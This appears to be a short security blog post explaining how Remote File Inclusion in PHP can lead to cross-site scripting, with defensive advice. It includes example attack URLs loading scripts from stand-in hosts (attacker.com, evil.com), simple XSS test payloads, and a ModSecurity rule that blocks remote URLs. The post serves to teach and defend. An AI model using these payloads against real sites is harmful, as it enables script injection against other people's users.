XSS via Remote File Inclusion Vulnerability

By /

Listen to this Post

Featured Image
A security researcher demonstrated a Cross-Site Scripting (XSS) attack via Remote File Inclusion (RFI) by injecting malicious JavaScript through an external URL parameter:

https://example/index.php?site=<external_url>

The payload was hosted on GitHub, triggering an alert when executed. This vulnerability occurs when a web application dynamically includes external files without proper validation.

You Should Know:

1. Exploiting RFI to XSS

Attackers can abuse RFI to load malicious scripts:

https://vulnerable-site.com/page.php?file=https://attacker.com/malicious.js

2. Testing for RFI/XSS

Use curl to check if a site includes external files: 

curl -v "http://example.com/index.php?site=http://evil.com/payload.js"

3. Preventing RFI & XSS

  • Input Validation: 
    $allowed_sites = ["home.php", "about.php"];
if (in_array($_GET['site'], $allowed_sites)) {
include($_GET['site']);
}
  • Use `allow_url_include=Off` in php.ini.
  • Content Security Policy (CSP): 
    <meta http-equiv="Content-Security-Policy" content="default-src 'self'; script-src 'self'">

4. Manual XSS Payload Testing

<script>alert(document.domain)</script> 
<img src=x onerror=alert(1)>

5. Automated Scanning with Tools

  • Burp Suite (Intercept & modify requests)
  • OWASP ZAP (Automated XSS scanning)
  • XSS Hunter (Blind XSS detection)

6. Server-Side Protections

  • ModSecurity Rules: 
    SecRule ARGS "@rx \b(https?|ftp)://" "id:100,deny,msg:'Remote File Inclusion Attempt'"

What Undercode Say:

Remote File Inclusion (RFI) leading to XSS remains a critical web vulnerability. Attackers exploit weak input validation to inject malicious scripts, compromising user sessions. Always:
– Disable remote file includes in PHP (allow_url_include=0).
– Use CSP headers to restrict script sources.
– Employ WAFs (like Cloudflare or ModSecurity) to block RFI/XSS attempts.

Linux Command for Log Analysis:

grep "include.http" /var/log/apache2/access.log

Windows Command for URL Validation:

(Invoke-WebRequest "http://example.com/?param=test").Content -match "alert("

Expected Output:

A secure web application should never reflect unsanitized input or allow arbitrary remote file inclusion. Implement strict whitelisting and monitor logs for exploitation attempts.

Prediction:

As web apps increasingly rely on dynamic content, RFI-based XSS attacks will rise. Developers must adopt stricter CSP policies and automated security testing to mitigate risks.

References:

Reported By: Shivangmauryaa Bounty – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

💬 Whatsapp | 💬 Telegram

Related Posts: